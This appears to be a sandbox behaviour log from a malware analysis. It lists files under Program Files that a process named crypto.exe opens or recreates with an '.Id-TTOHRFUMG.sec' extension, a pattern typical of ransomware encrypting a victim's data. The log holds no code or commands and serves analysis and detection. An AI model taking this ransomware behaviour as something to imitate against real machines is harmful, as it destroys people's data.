File created	C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libpsychedelic_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\eBook.api.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Media Player\Media Renderer\connectionmanager_dmr.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-ui_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\BORDERBB.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository_2.3.0.v20131211-1531.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-explorer.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-explorer_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql2000.xsl.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MYSL.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\logo.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\about.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PROOF\MSTH7ES.LEX.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access_output\libaccess_output_file_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_zh-CN.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199609.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02886_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\combo-hover-right.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\ehshellLogo.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationRight_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_VideoInset.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_ko_KR.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151067.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR2F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ONPPTAddin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\WPULQT98.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\EssentialLetter.dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\fa.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\css\weather.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Hermosillo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\AccessWeb\RPT2HTM4.XSL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\add_down.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-explorer.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsFormTemplate.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SpringGreen.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\sqlceca35.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\misc\libaddonsfsstorage_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Media Player\Skins\Revert.wmz.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL00712_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Apex.thmx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\crashreporter.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\UseOpen.otf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\bin\startNetworkServer.bat.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Campo_Grande.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\jsadebugd.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21329_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00932_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\item_hover_flyout.png.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Syowa.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\EXCEL.DEV_COL.HXT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\AUTHZAX.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_divider_right.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\9.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-1.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187849.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\buttonDown_Off.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_down_BIDI.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Circle_VideoInset.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01840_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WING1.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\GreenTea.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsFormTemplateRTL.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\FEZIP.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libedgedetection_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Edmonton.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198025.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0213243.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\wmpconfig.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows NT\TableTextService\TableTextServiceAmharic.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME-JAVAFX.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR9B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\drag.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21310_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00078_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows NT\Accessories\wordpad.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Brunei.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18190_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\EMABLT32.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\PULLQUOTEBB.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\stream_out\libstream_out_transcode_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Flow.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\TOOLICON.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\REVERSE.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\SOA.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_top.png.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\icudtl.dat.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluTSFrame.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Premium.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00686_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Vladivostok.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14869_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MEDIA\BREEZE.WAV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGBORDER.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\README.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\ar.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sampler_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01461_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\BCSAutogen.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\updater.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Journal\jnwmon.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_bottom_right.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tbilisi.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_fa.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04108_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00222_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY01563_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGSTORY.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\logo.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0335112.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\SENDTO.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\flyout_background.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107544.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-progress-ui_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0157167.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\PublicFunctions.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\ADRESPEL.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\Gadget_Star_Full.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_de_DE.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerConstraints.exsd.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Argentina\Catamarca.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\Beulah.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libau_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\NavigationRight_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Pangnirtung.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Etc\UCT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04195_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR3B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_Groove.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsBlankPage.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-10.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\eula.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\Apia.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Informix.xsl.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0234266.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR4F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BabyBlue.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Nicosia.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\LTHD98.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\IPDSINTL.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\sqlceqp35.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_hail.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\Bear_Formatted_MATTE2_PAL.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-api_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\IPEDINTL.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\GRIPMASK.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Stationery\1033\CURRENCY.HTM.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToNotesBackground.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-snaptracer.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Krasnoyarsk.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN00231_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL001.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Mail\wab.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\3RDPARTY.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01015_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Oasis.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-crt-multibyte-l1-1-0.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Journal\Templates\Seyes.jtp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\logo.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Mail\wabimp.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiler_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Rio_Branco.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04269_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0284916.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18198_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\services_discovery\libupnp_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_hail.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\meta-index.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Dawson_Creek.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105332.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY00642_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\IEAWSDC.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\TWCUTCHR.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Elemental.xml.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\decora-sse.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.PL.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-spi-quicksearch.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14792_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\Document.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGPICCAP.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\ro.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN027.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows NT\TableTextService\TableTextServiceSimplifiedZhengMa.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18219_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS01634_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\reveal_rest.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Etc\GMT+1.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199483.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Flow.thmx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\MMSS.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\AddToViewArrow.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\CATWIZ.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\button_play.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-util-enumerations.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGDOTS.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Access\DataType\Payment Type.accft.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\timer_up.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382955.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\deploy\messages_pt_BR.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0182888.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.HK.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\deploy.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\hint_up.png.Id-TTOHRFUMG.sec	crypto.exe
